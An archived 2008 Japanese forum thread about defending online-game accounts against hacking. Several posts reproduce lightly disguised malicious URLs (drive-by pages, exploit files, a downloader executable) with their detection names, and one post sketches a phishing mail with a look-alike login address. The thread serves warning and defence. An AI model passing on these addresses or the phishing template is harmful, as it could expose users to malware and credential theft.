中華がFFに切り替えてるから、ROは以前よりは平和になったと言える。
今のFFのハク被害の状況は、2年程前のROの時に近いし。
ゲームが衰退しないと被害が減らないってのは、やるせないけどね。

ただ来月予定のログイン方式切り替えに伴って、ROでも激増する可能性は
否定できないし、どうなるか戦々恐々と言った所じゃない?

896 名前:(○口○*)さん:08/08/25 02:05 ID:eiF/NGAM0
ROで成果が出せなくなったんだろうね
間接的にはBOTを継続して潰すことが出来た結果とも言える

BOTがダメ→垢ハクも成績悪し→撤退

897 名前:(○口○*)さん:08/08/25 02:40 ID:gdgFF1tp0
FFユーザーの脇の甘さも、業者につけ込まれる要素かな。
PCでしかプレイできず、今まで積み上げてきた様々な安全確保のTipsが有効に活かされていたゲーム。
それに対して、コンシューマハードでプレイすることも可能で、比較的限られた層だけがPC環境をゲームプレイに用いていた、
それ以外の情報Wikiサイトや公式コミュニティサイトだけをPCで閲覧するようなユーザーも多いゲーム。
この間に意識差が無かったとは言えないだろう。

あとは、FFで鯖移動サービスが有料オプションとして可能になったのも無関係とは言えない要素。
釣り上げたアカウントの中身を、より高値で処分できる鯖へ移転させることが珍しくない。費用は抜かれた側持ちで。

898 名前:(○口○*)さん:08/08/25 13:38 ID:DNJ/hdoH0
そういえば「Flash最新版の導入を促すFlash」って無いね
あればいいのに

899 名前:(○口○*)さん:08/08/25 16:43 ID:dluFaQ9y0
Webログイン移行で別な観点から要注意な事がありますね。
「簡単!!一発!!自動ログイン マジオヌヌメ→ ROランチャー」
なんてツールが出てくるかもしれないので、
PC初心者の方は便利そうだからと迂闊に手を出さないように
注意が必要かと思います。

現状、IE6↑以外はサポート対象外というだけで、IEエンジン使った
癌公式にしか繋がらない自作ブラウザをランチャーとして使用するのは、
(ブラウザとは何かという定義の問題になってしまうので)
不正ツールに該当しないような気配が有りますが、その辺りの油断を狙って
こういったツールにID・パス抜き仕込まれたら一巻の終わりでしょう。

実際中華がそんな事を仕掛けて来るかどうかは解りませんが、
くれぐれも御注意下さいまし。

900 名前:(○口○*)さん:08/08/25 17:26 ID:PRB79Owr0
ランチャーツールより
ガンホーからのメールを装って
「重要なお知らせがあります。下記URLよりアトラクションセンターにログインして投稿確認をお願いします。」とか書いて
フィッシングURL「http://www■gang-ho■co■jp/login.php」とか書いてあれば
結構お手軽にヤバイんじゃね?

901 名前:(○口○*)さん:08/08/26 06:51 ID:xwzUiE140
XREA、ハックアドの挿入が再発してるという情報があがってきてる。
(2chレン鯖板XREAスレ839/同人板XREAスレ198)

有料版でも駄目、htmlのみでも駄目、運営の出した対策でも再発。
ここまで問題が解決しないとなると、XREAは本気で駄目な気が。
こんなんじゃFWで弾くってのもそのうち冗談で済まなくなる気すらする。

902 名前:(○口○*)さん:08/08/26 07:20 ID:uu4Ln3/Z0
>>901
FFIXの被害サーバーの一部がさくらの再販ってところまで含めると
XREAだけといえないのも事実
XREAも含めるとCOREも…ってなっていくとサーバーレンタル資金の
都合での閉鎖を宣言するサイトも出てきかねないぞ。

CORE、XREAだから出来るようなことをしてるサイト見られるし
実際CRONを使ってると思わしきサイトもある。
(思わしきではなく95%以上CRON使用と断定できるが)

他にもPHP.iniの問題等課題が残るサーバーではあるけど

結局は>>885
そしてサイト管理側の現実と本音は>>884

903 名前:886:08/08/26 09:59 ID:Q/Vt106c0
>>881 のサイトについてexciteから返信 調査の後対応する とのこと
どのような対応をしたかは知らせませんがご了承くださいってメールきました。
該当ページにいったら消去されてた

904 名前:(○口○*)さん:08/08/26 10:00 ID:hmlpe0bJ0
アカウントハック対策・セキュリティ 総合スレ 住人の自称詳しい方々、こんなところまで
きて知識自慢とか恥ずかしいからやめてくださいね^^;

905 名前:(○口○*)さん:08/08/26 10:00 ID:hmlpe0bJ0
ゴバーク

906 名前:(○口○*)さん:08/08/26 10:01 ID:lR1Rp8Yd0
わざとだろ
わざとだろ

907 名前:(○口○*)さん:08/08/26 10:04 ID:W7YyE3CE0
xreaスレか?w

908 名前:(○口○*)さん:08/08/26 12:59 ID:9zIEU39J0
予想通りxreaスレにかいてあったなw

909 名前:(○口○*)さん:08/08/26 14:51 ID:PuIjZdY50
KcrnaeghDrv.dll
Trojan-GameThief.Win32.OnLineGames.svyr

こんなの出てきた
どう見たってアウトですよね・・・

910 名前:(○口○*)さん:08/08/26 14:53 ID:OEpZy4R80
はい。

911 名前:(○口○*)さん:08/08/26 15:03 ID:1gm3rYG60
そろそろ、テンプレの相談時期かな?
なんか変更が必要な箇所あったっけ?

912 名前:(○口○*)さん:08/08/26 16:42 ID:1gm3rYG60
129 (○口○*)さん 08/08/26 16:25 ID:qew6OVW50
自分の支払い方法の詳細を見ると載ってます
http://panterorr■com/blog-entry


隔離スレに貼られていた内容

http://panterorr■com/blog-entry/ でないとアクセスに失敗するw
http://www■k5dionne■com/ffxmmi   iframeで呼びだされるページも同じく末尾の/抜け。

http://www■k5dionne■com/ma/Ms06014■htm
http://www■k5dionne■com/ma/ani■c
http://www■k5dionne■com/ma/Yahoo■htm
http://www■k5dionne■com/ma/xia■exe

おなじみのアドレス+ファイル名ですな
blog-entry : Trojan-Downloader.JS.Agent.cid
ffxmmi : Trojan-Downloader.HTML.IFrame.dv
Ms06014.htm : Trojan-Downloader.JS.Psyme.kf
ani.c : Exploit.Win32.IMG-ANI.ac
Yahoo.htm : Exploit.HTML.IESlice.z
xia.exe : Trojan-Downloader.Win32.Delf.jfj

913 名前:(○口○*)さん:08/08/27 01:43 ID:1sU0i7Kc0
中華、その手のミス多いなぁ
お陰で助かってる面もあるので、じゃんじゃんミスして欲しい所だが

914 名前:(○口○*)さん:08/08/27 01:49 ID:5tuMbigy0
MMOBBSだけじゃなく、2chのネトゲ板や
ネットwatch板ほかも爆撃してるな

915 名前:(○口○*)さん:08/08/27 02:40 ID:srUfsDxE0
中華でなくてもディレクトリを/で終わらせないのはよくあるミス。

916 名前:(○口○*)さん:08/08/27 03:12 ID:eNsb9UL20
HTTPで表記する場合、ディレクトリ末尾には/をつけないといけない。
でも忘れることが多いので、実用的な対策はとられている。
一般にはディレクトリ末尾の/を省略すると末尾に/を補完した
URLに向けたパスへのMovedと扱われるけど、このときに補完された
URLって「Apacheが『俺のURLとパスはこれだ!』と思ってるURL」
なんだよね。


ちなみに1つだけ例外があって、document rootになってるパスの
場合だけは/を省略できる。

http://www.example.com/path/of/dir/
×http://www.example.com/path/of/dir
http://www.example.com/
http://www.example.com

豆知識な。

917 名前:(○口○*)さん:08/08/27 04:41 ID:srUfsDxE0
1番目のは dir というディレクトリを指定している。
2番目のは dir というファイルを指定している。
→ dir というファイルは無いけど、ディレクトリならあるよとサーバーが教えてくれる。
4番目は、ブラウザが自動的に/を付けてくれる。

例外なんて、覚えない方が良いのですよ。

918 名前:(○口○*)さん:08/08/27 07:34 ID:uBjtVN/r0
>>912
8月9日登録の福建中華ドメインな、取得後間もなく大規模爆撃。
panterorr■com の検索結果 約 5,570 件

登録地、IPが天津(tj)になっているのが目新しい。
成都支部、香港支部に続いて天津支部が出来たのかもしれんね。

登録日とかつての罠コメントから、ソ連の対日参戦日を選んだと思うよ。
movie1945だったかでソ連が日本を云々という罠コメを張りまくっていたことがある。
【こういうの】
ソビエト赤い軍隊によるGuandong日本の敗北実質映像 www■movie1945■com/keis/

気を付けてくれよな!

919 名前:(○口○*)さん:08/08/27 07:40 ID:zTemp5Gp0
同じアドだけど少し手段違い
こちらも隔離スレ

764 名前:名無しさん@ゴーゴーゴーゴー![] 投稿日:2008/08/26(火) 23:01:49 ID:FB0Nw8gr0
http://panterorr■com/dfsqras■jpg
ネタだよな?

こっちは偽装jpg

920 名前:(○口○*)さん:08/08/27 14:04 ID:5tuMbigy0
960 名前:名無しさん@お腹いっぱい。:2008/08/27(水) 13:17:05 ID:j6EXibF7
Q5、冒険者アカデミーってなに?
A5、つい最近出来た初心者にやさしい学校だ!街に入ると自動的にマップに+のマークがつく。そこへ行きNPCに話しかけ冒険者アカデミーへ。
  様々な特典があり便利でレベルアップもできてノービス脱却も早いよ。
  受付を済ませ「プロン」「アルディ」「フェイ」の話を聞くとJOB2うp。(この時点で9/10にはなってるはず)  
  これだけでもう転職ができるぞ!便利な世の中になったもんだwwwwwwwwww
  この他に先に進むとNPC「ミッド」から「アカデミー入学生帽子」がもらえる
  簡単なクエストもあるから転職したらクエストをやってみよう。NPC「ルーン」に話しかければクエストができる
  クエストを進めると便利な装備を貰えるからガンガンやっとけお!

Q6、金たまらNEEEEEEEEEEEEEEEE!
A6、wikiにもあるが「作成」に使われる収集品を集めると金になる。「毒ビン」「コンバーター」「アルケミスト製薬品各種」に 
  使われるの物を調べてそのモンスターを狩るようにしとけ。経験と金銭が儲かる狩場を自分で探せ。カードを狙うのあり

Q7、起動したけどサーバーが一つしかないぞコラ
A7、そっちはウルド。デスクにないならプログラムファイルから開いて男の顔のアイコン「Ragnarok.exe」をクリック汁。

VIPROが何となく分かるFLASH
http://www■livedoorm■com/blog■htm

921 名前:(○口○*)さん:08/08/27 14:13 ID:tMhXjE4c0
昨日から複数の隔離スレに垢ハック張られてるな・・・
オリンピック終わったから、また本業に力入れ始めたか

922 名前:(○口○*)さん:08/08/27 14:43 ID:H4+PIXCI0
管理スレに削除依頼出すのも忘れずにな

923 名前:(○口○*)さん:08/08/27 20:28 ID:0hlad3+t0
>>921
最近多いなと思ったらそういうことか
どうしようもねー民族だな

924 名前:(○口○*)さん:08/08/27 20:39 ID:eNsb9UL20
ああ。オリンピックやってたのか。

925 名前:(○口○*)さん:08/08/28 11:16 ID:c3nClgpB0
宇宙ステーションがマルウェアに感染
http://www.itmedia.co.jp/enterprise/articles/0808/28/news023.html

>感染したのはオンラインゲームのパスワードを盗み出すマルウェアだった
吹いた

926 名前:(○口○*)さん:08/08/28 11:56 ID:96MiOCzr0
>「なぜ宇宙へ持っていく前にウイルスチェックをかけておかなかったのか」とクルーリー氏は疑問を呈している。
に同意。

927 名前:(○口○*)さん:08/08/28 13:46 ID:+rJR+tD00
Live OneCareは垢ハックウイルスへの対応はいいのかな?
最近検出テストの順位がいいから気になるなー

928 名前:(○口○*)さん:08/08/28 14:14 ID:96MiOCzr0
物によるからなんとも。

929 名前:(○口○*)さん:08/08/28 14:19 ID:c3nClgpB0
対応の早さで見るのが良いと思うんだけれど、そう言う情報ってよっぽど自信がなければ
すすんでアピールしたりはしないよね。

930 名前:(○口○*)さん:08/08/28 16:50 ID:+rJR+tD00
そうなのかーThx
ちょうど今使ってる先生が期限切れるから乗り換えてみよっかな

931 名前:(○口○*)さん:08/08/28 18:14 ID:w5Y9dLop0
企業向けセキュリティー製品“Forefront”シリーズ
ttp://ascii24.com/news/i/soft/article/2006/11/24/print/666064.html
>ロシアZAO Kaspersky Lab社の“Kaspersky”

MSですら、自社エンジン単独運用を諦めて、Kasperskyのエンジン提供を受けるようになっているし。

ttp://www.itmedia.co.jp/enterprise/articles/0707/13/news012.html
ttp://www.microsoft.com/japan/users/onecare/2/01.mspx
OneCareも、GeCadから買収したエンジンを諦めて、Kasperskyベースになっているのかもしれない。

932 名前:(○口○*)さん:08/08/28 19:12 ID:tggW6mUW0
現状のカスペの欠点は、ダウンロードだな。
ROのクライアントをダウンロードするとどんどん重くなっていく。

リアルタイムスキャンをその時だけ切れば良いんだけれどね。

933 名前:(○口○*)さん:08/08/28 19:21 ID:/zASNYwX0
カスペエンジン一色に染まると、それはそれで危険だなぁ
今でも中華はカスペを抜けるように試行錯誤してるのに。

OneCareは見つけるがカスペは見逃した、ってケースも結構あったし
MSには独自で頑張って欲しいものだ……

934 名前:(○口○*)さん:08/08/28 19:34 ID:96MiOCzr0
ForefrontとOneCareは全くの別物。

935 名前:(○口○*)さん:08/08/28 19:58 ID:tggW6mUW0
>>833
大事なのはあくまで「対応速度」だと思うんだ

936 名前:935:08/08/28 19:58 ID:tggW6mUW0
アンカーずれすぎた\(^o^)/
>>933宛ね

937 名前:(○口○*)さん:08/08/28 20:15 ID:gsci11iK0
>935
過去に2桁ちょいカスペに検体を送ってるが、それは逆に言えば
他ので検出するのにカスペでは見逃してた、という事。

確かにカスペ検体送ってからの対応の早さは凄いものがある。
しかし誰かが検体を送らなければ対応が遅くなるし、検体を送る場合
根拠とするのはVTの結果で、つまり他の検出結果。

カスペ一色に染まると危険というのは、こういう意味。

938 名前:(○口○*)さん:08/08/28 20:41 ID:UeHQYi5S0
でも他のやる気無さは異常だろ…

939 名前:(○口○*)さん:08/08/28 21:29 ID:8fsqTYMd0
USBメモリで感染か:宇宙ステーションがマルウェアに感染 - ITmedia エンタープライズ
http://www.itmedia.co.jp/enterprise/articles/0808/28/news023.html
>感染したのはオンラインゲームのパスワードを盗み出すマルウェア

垢ハックウィルスもついに宇宙規模にw

>>937を見て、生物の多様性の話を思い出した。

940 名前:(○口○*)さん:08/08/28 21:42 ID:96MiOCzr0
>>925

941 名前:(○口○*)さん:08/08/28 21:44 ID:8fsqTYMd0
>>927-の話に気を取られて見落としてたw
指摘thx

942 名前:(○口○*)さん:08/08/28 22:59 ID:rXqu4cYU0
ROを作動させるとカスペがこんなことを言うんだが

プロセスは、ドライバをインストールしOSへの完全な
アクセス権を獲得しようとしています
そうするとセキュリティのコントロールができなくなります 詳細_

疑わしい動作
Sduspicious Driver installaion

プロセスを実行します
C:\Grvity\RagnarokOnline...\GameMon.des

→許可
→拒否
→信頼ゾーンへの追加

943 名前:(○口○*)さん:08/08/28 23:02 ID:uk8ZEzkc0
おめでとう。
君のカスペ君は正常に動作しているようだ。

944 名前:(○口○*)さん:08/08/28 23:04 ID:rXqu4cYU0
>>943
とどのつまりこれって何?

A1.垢ハクウィルス

A2.ROがOSへの完全なアクセス権を必要とするゲーム

945 名前:(○口○*)さん:08/08/28 23:17 ID:ycfXs8Tj0
RO(のnProtect)がOSへの完全なアクセス権を必要とするゲーム

946 名前:(○口○*)さん:08/08/28 23:22 ID:rXqu4cYU0
なるほど…つまり

アカウントハックという可能性も当然あるけれど
ROをプレイする限り付きまとう害のないメッセージでもある、と認識しといていいかな

947 名前:(○口○*)さん:08/08/28 23:34 ID:tggW6mUW0
ジャイアンみたいなヤツがいるんだが、どうする?
でも縛り付けたらROは動かんよ。みたいな。

948 名前:(○口○*)さん:08/08/29 00:36 ID:iIh2oE0n0
nProが生成するdump_wmimmc.sysがカーネルドライバなので、それに対しての振る舞いだな。
x64なwindowsだと、署名の無いドライバとしてイベントログに毎回記録されているけど。

949 名前:(○口○*)さん:08/08/29 03:14 ID:3i50urm80
2ちゃんの隔離スレに貼られてた

http://antersd38fc2■com/blog-entry

2008年8月9日登録のFC2モドキドメイン
Aguseによると
検出されたウイルス(ワーム、スパイウエア)
Trojan-Downloader.JS.Agent.cid

らしい。

950 名前:(○口○*)さん:08/08/29 10:33 ID:Jql3PFGF0
アプリコに貼られてた

151 名前:ヒール回復774さん[] 投稿日:2008/08/29(金) 10:23:31 ID:yAT9H4cg
遊戯王OCGレインボーダークドラゴンデッキ Yu-Gi-Oh!
TRADING CARD ...
fb/ ホームページの「遊戯王研究所」では、数十のデッキを
ご紹介しています。 ... 遊戯王OCG Yugi- ... 「カードキン
グダム」で検索して頂くと、他にもたくさんのデッキ解説動画
があります。すべて驚きのテクニック満載!ぜひ一度ご覧 下さい。
この動画では【レインボーダークドラゴン】の1ターンキルコン
ボを解説しています。デッキ解説記事はこちら。
ttp://www■excite-blog■com/keyword/d0808033566_5linmovesmm2■rar
ホームページの「遊戯王研究所」では、数十のデッキをご紹介し
ています

951 名前:(○口○*)さん:08/08/29 11:24 ID:Ac9k3OkZ0
>>949の踏んだぽいな・・・・
カスペOnlineでスキャンしたらIEキャッシュの中に残ってて
キャッシュ消した後はHITしなかったんだが

これって大丈夫?
activXは切ってた

952 名前:(○口○*)さん:08/08/29 12:05 ID:ndtIJKeX0
大丈夫?といわれてもたぶんとしか言いようない
いつ感染したのか、活動済みなのかもわからんし

953 名前:(○口○*)さん:08/08/29 12:09 ID:kfB5vpl60
保証なんて誰にもできないよ。OS再インストールコースいってらー

954 名前:(○口○*)さん:08/08/29 12:12 ID:YUj6/QUg0
>>949
k5(略) >>912
MS06-14(MDAC、WindowsUpdateで阻止可能)
アニメーションカーソル(WindowsUpdateで阻止可能)
Yahoo!メッセンジャー(入れていなければ阻止可能。アップデートがあるかどうかは知らない)
>>951
ということで判断できないならリカバリ。
もっとも物凄く古いのでノーガードでもなければ検知するはず。
ttp://www.virustotal.com/analisis/eaaea8c0c8f965c81b6cbee108a6534e

>>950
こちらもノーガードでなければ検知するはず。
ttp://www.virustotal.com/analisis/75397ec6fed0b7ce4a47d32746d5d656
AutoRunだからUSBメモリなどに寄生するタイプか。

955 名前:(○口○*)さん:08/08/29 12:16 ID:Ac9k3OkZ0
ああすまない少し焦ってたようだ
たまたまこのとき常駐ソフト使ってなかったからパニックになってしまった

URLクリックしたのはついさっき
クリック後即カスペスキャン
キャッシュにあったTrojan-Downloader.JS.Agent.cidを削除
その間〜現在までにRO関連はログインしてないな
ZAがクリックした時間に66.160.206.164へのアクセスを弾いてた
ActiveXは切ってる。Javaはついてたが・・・・

なにぶん初めてでどうしていいやら・・・・

956 名前:(○口○*)さん:08/08/29 12:23 ID:Ac9k3OkZ0
まぁ疑わせしはリカバリだな、それは分かってたがw

すまんありがとう
いい機会だし再インストいってくるわ

957 名前:(○口○*)さん:08/08/29 12:49 ID:k3lHE3Ql0
まあどうしてもってんなら、
1. 複数オンラインスキャンでチェックする
2. とりあえずそのPCでログインをしないでおく
3 少し日が経ってから再チェックする
4. 検出されなければまあ大丈夫だろう

958 名前:(○口○*)さん:08/08/29 13:43 ID:iIh2oE0n0
>>954
Yahoo!メッセンジャーに関しては以下の通り。
ttp://messenger.yahoo.co.jp/notice.html
ログインした時に古いバージョンだと警告されるようだし、そもそも脆弱性問題のあった頃のバージョンは、サポート終了で
現在はログインする事が不可能ぽいから、現役で使っているユーザーなら心配は無さそう。
逆に、以前は使っていたものの、今では塩漬けでインストールされたまま放置しているユーザーだと危ない。

959 名前:(○口○*)さん:08/08/29 16:14 ID:IdXclpY60
>>951
踏んだのはそれではないけど
ギルメンがmixiに貼られてた罠URL踏んで感染後、
カスペルの体験版落として発見・駆除したけど
結局その後知らない誰かにログインされてたから
安心しないほうがいい

その時はたまたまログイン現場に自分がいて、
即ギルメンに今インした?と連絡したから無事で済んだけどね

960 名前:(○口○*)さん:08/08/29 16:29 ID:G9MetgNq0
本当活発化してきてるよね、他の板でも唐突に貼られてることが多くなった
んでちょっと早いけど>>970踏んだ人は次スレよろね

961 名前:(○口○*)さん:08/08/29 17:22 ID:ndtIJKeX0
やっぱオリンピックが終わったからなのかw

962 名前:(○口○*)さん:08/08/29 19:58 ID:Y8c3GIoc0
質問です
家での垢ハクの心配はないのですが、今度ネカフェを利用したいとおもっています。

ネカフェではメダルを経験値に交換するだけなのですが
主要装備をひとつのキャラに集めておいて(商人など)
ネカフェでログインするのはそのキャラとは違うキャラでインすれば
たとえ垢ハクされてもアイテム等の心配はないのでしょうか?

帰ってからインしたキャラのキャラパスと念のためアトラクションIDを変更で
被害を受けないですむでしょうか?

よろしくおねがいします

963 名前:(○口○*)さん:08/08/29 20:06 ID:G9MetgNq0
1.キャラパスが共通じゃない限りは万が一の時はセーフだと思う
2.家戻ったら垢パス変更しておくのはいいこと、万全といえるかな?

ネカフェのPCが感染していたと仮定して
仕掛けた側がいつ気付くかにもよるだろうし、帰るまでにやられる可能性もある

964 名前:(○口○*)さん:08/08/29 23:15 ID:k3lHE3Ql0
家が安全だと仮定すれば、
ネカフェに行く前にPASSを変更して、
帰ってきてから戻せばいい

965 名前:964:08/08/29 23:16 ID:k3lHE3Ql0
やられる可能性を言ってしまえば、ネカフェで遊べなくなるよ。

966 名前:(○口○*)さん:08/08/31 16:51 ID:cTXs4HKZ0
未だにネカフェから繋ぐ人なんているの?
そんなにみんなアカハクされたいの??

967 名前:(○口○*)さん:08/08/31 17:30 ID:D56EXnDd0
PeerGaurdian2日本語版って今DLできなくなってますか?
3日前ぐらいからずっと「ページを表示できません」になってしまう…

968 名前:(○口○*)さん:08/08/31 18:17 ID:X1wGIXBb0
>>856-859

969 名前:(○口○*)さん:08/08/31 19:28 ID:EH8+eBcJ0
最近、ラーメン板とか温泉板でハックURLが貼られたのを見たなぁ。
何がしたいんだろう。

970 名前:(○口○*)さん:08/08/31 19:38 ID:jRLpm3AX0
2ちゃん?
全く関係ないとこにもばら撒かれてるね
俺はゲーム音楽板で貼られてるの見たよ

971 名前:(○口○*)さん:08/08/31 19:38 ID:RtnmXm230
ネトゲに関連するキーワードで検索して掛かった所に
無差別でスクリプトが貼り付けまくってるだけだろうから、
スレ内の何かがHITしたんだろう。

972 名前:(○口○*)さん:08/08/31 20:13 ID:NxrsGHPx0
半角系に貼り付けたら引っかかる奴多そうだなw

973 名前:(○口○*)さん:08/08/31 20:21 ID:Ktd2LGhS0
角煮に張られたら間違いなく踏む\(^o^)/

974 名前:(○口○*)さん:08/08/31 21:05 ID:6ev6HvRa0
PG2の開発が終わってしまったのなら、これを突く穴が見つかったら
けっこう大変だな。

975 名前:(○口○*)さん:08/08/31 21:10 ID:fA19ez3T0
PG2って、開発が終了したからって穴が突かれるようなタイプのものか…?

976 名前:(○口○*)さん:08/08/31 21:30 ID:1aHY15Rr0
あるとすれば、制限リストをダウンロードor更新する所に
オーバーフロー関係のバグがあるかどうかかな?

977 名前:(○口○*)さん:08/08/31 23:18 ID:Vda37QBg0
それ以前にVista対応の正式公開版が存在しないんじゃ?
RC1版があるのは知ってるんだが。

自PCのOSをVistaに切り替え出来ん理由は幾つかあるが
うち1つがPG2だったりする……

978 名前:(○口○*)さん:08/09/01 01:00 ID:bwE8wygX0
PG2そのものはオープンソースという形で公開されているのだから、攻撃されるような脆弱性が見つかった場合でも
有志による修正には一応期待できる。
それよりも厄介なのは、現在進行形で増えつつある、セキュリティプログラムの動作を妨害するマルウェアか。
hosts追記による防衛法が広まった為か、最近はhostsを削除したり、中身をクリアするような物もあるようだ。
同様に、PG2のプロセスをシャットダウンさせるような物が登場しないとも限らない。

979 名前:(○口○*)さん:08/09/01 01:07 ID:3mOsx1MA0
>PG2そのものはオープンソースという形で公開されているのだから、

で、だれか後継の開発人はおるんか?
誰もやらなかったら、いくらオープンとはいえおしまいだぞ。

980 名前:(○口○*)さん:08/09/01 06:57 ID:CfS4fmjF0
>970が反応ないのですが、わたしはスレ立てしたばっかりで立てられないので、>>981さんお願いします。

スレタイ:アカウントハック対策・セキュリティ 総合スレ Lv.2

テンプレの変更箇所は>1の次スレについてがLiveROに移ったので依頼じゃないことと、リンク関係位かな

×>・スレ立て依頼は>>970がしてください。反応がなければ以降10ごとに。
○>・スレ立ては>>970がしてください。反応がなければ以降10ごとに。

−−−
【過去スレ】
アカウントハック総合対策スレ9
 http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/
セキュリティ対策、質問・雑談スレ5
 http://enif.mmobbs.com/test/read.cgi/livero/1205488101/
それ以前のログはROセキュリティWiki(http://rosafe.rowiki.jp/)
−−−

−−−
【過去スレ】
アカウントハック対策・セキュリティ 総合スレ
http://enif.mmobbs.com/test/read.cgi/livero/1213363112/

以前のログはROセキュリティWiki(http://rosafe.rowiki.jp/)
−−−

【備考】
・PeerGuardian2
  http://sky.geocities.jp/vs_ro_hack/pg2.htm にあるリネージュ資料室さんへのリンクが古いアドレスのようです。

981 名前:(○口○*)さん:08/09/01 07:10 ID:CgbKtnfu0
立てました

アカウントハック対策・セキュリティ 総合スレ Lv.2
http://enif.mmobbs.com/test/read.cgi/livero/1220220582/

今から>>2以降埋めていきます

982 名前:(○口○*)さん:08/09/01 09:54 ID:m8Rm+Ozb0
sage入れ忘れたけれど、これ足しておきました。
>【PeerGuardian2 暫定ダウンロード先】

983 名前:(○口○*)さん:08/09/01 11:56 ID:2oK+gfyj0
パスワードを盗むウイルスが急増、半数は「オンラインゲーム」を狙う
ttp://itpro.nikkeibp.co.jp/article/NEWS/20080829/313755/
ttp://vil.nai.com/images/blog290808b.jpg
2008年には30万種類近くに、仮想空間での詐欺行為や破壊行為にも注意

984 名前:(○口○*)さん:08/09/02 17:21 ID:nDt4ripe0
変形亜種入れたら平気で数が増えていくな

985 名前:(○口○*)さん:08/09/02 18:35 ID:9nZHu6ib0
中国政府が取り締まらないとどうにもならなそうだな

986 名前:(○口○*)さん:08/09/02 18:41 ID:WPUSUff30
今のところサイバーテロに政治が積極的に関わらないからなあ

987 名前:(○口○*)さん:08/09/02 19:50 ID:x9kcn0ub0
消化促進age

988 名前:(○口○*)さん:08/09/03 02:32 ID:L5kRr8B40
Google Chrome、かぁ。

http://journal.mycom.co.jp/news/2008/09/02/003/index.html
>マルウェアの動作をタブ内部のサンドボックスで遮断でき、
>ウィンドウのポップアップを防止したり、システム本体への
>影響を与えないなど、安全なブラウジング環境を提供する。

どの程度がんばってくれるかはわからないけど
多様性が生まれてくれるのはいいことだね。

989 名前:(○口○*)さん:08/09/03 06:17 ID:MfAvfG0s0
WebKitベースか。
windows版Safariがさっぱりな現状、まともに使い物になるKHTML系エンジンのブラウザとして仕上がってくれると良いが。

990 名前:(○口○*)さん:08/09/03 08:13 ID:nc1LORQZ0
Safariは別に極端に悪くないと思うが、それをWindows用にリリースする
Appleの姿勢がイマイチかと。
そういう意味では、あれよりはマシになるでしょう。

しかしIEとFirefoxがあるのに、Chromeに移る理由がないな。

991 名前:(○口○*)さん:08/09/04 02:34 ID:n1I44W0x0
俺はChrome結構気に入った。速くて快適だし。
でもnProtectのせいでRO中は動作しないという凄いオチ発見orz

992 名前:(○口○*)さん:08/09/04 02:50 ID:MzVW45qv0
マジかw
軽いならwebラジオ聞きながらやろうと思ってたが、絶望的だな

993 名前:(○口○*)さん:08/09/04 03:03 ID:oEo90Bro0
ユーザー視点ではわざわざ移る理由はなさそうだけど、web制作サイドなら、Macユーザー向けの表示確認を
windowsベースである程度こなせるという意味で、導入する価値はあるかもしれない。
それと共に、IEでしかまともに閲覧することのできないページが減ってくれるなら無問題。

994 名前:(○口○*)さん:08/09/04 07:48 ID:2YwwjM5K0
chromeを狙ったウィルスとか出てくんのかな

995 名前:(○口○*)さん:08/09/04 07:50 ID:YlPBxoMy0
ここ見落として次スレに書いてしまったので転載。

スマン質問なんだが、スキャンにも引っ掛からない場合でも垢ハックアドレス踏んだって報告見るけど、
何で踏んだってわかるんだ?何か表示されるの?

特に怪しいURL踏んだわけじゃないんだけど、昨日からPCがありえんぐらい読み込み遅くなったり
エラー出まくってウイルススキャン起動できなくなったりして、もしかして何か感染したのかと不安になったんで聞いてみた。
怖いからROはログインしなかった。

996 名前:(○口○*)さん:08/09/04 09:23 ID:ftmBEBaO0
>>995
それより解決したのか?

997 名前:(○口○*)さん:08/09/04 09:24 ID:xxFT/iW/0
踏んだ事に気付く理由

・セキュリティソフトの反応
・予想外のページに飛ばされて気付く(ページ真っ白なども含む)
・サイト内のリンクの筈がサイト外に飛ばされた(PG2でブロックしたなど)
・PCがなにか妙な挙動をはじめた

など、複数の可能性がある

>エラー出まくってウイルススキャン起動できなくなったりして
馬鹿者、とっとと対処せんか。

HDDの空き容量が足りなくなったとか、メモリが一部データエラー起こしてるとか、
CPUやGPUが(埃や他の要因で)過熱してるとか、不安定なソフトを入れたとかいろいろと
可能性はあるだろう。

だが、セキュリティソフトの起動障害は、不正ファイルを踏んだ可能性が高い。
特定のスキャンエンジンの障害の可能性もあるので、複数のセキュリティソフトの
オンラインスキャンを試みると、どれかがチェック可能かもしれん。

998 名前:(○口○*)さん:08/09/04 10:22 ID:xxFT/iW/0
セキュリティソフトの更新期限が切れたので、F-Secure2008の体験版を入れてみた。

ROが重力エラー出すんですが・・・・・・・・・・・・・・他の奴試すか。orz

999 名前:(○口○*)さん:08/09/04 10:23 ID:xxFT/iW/0
次スレ誘導

アカウントハック対策・セキュリティ 総合スレ Lv.2
http://enif.mmobbs.com/test/read.cgi/livero/1220220582/

1000 名前:(○口○*)さん:08/09/04 10:24 ID:gvpFbn5a0
初の1000!

1001 名前:1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。


全部 最新50
DAT2HTML 0.35d Converted.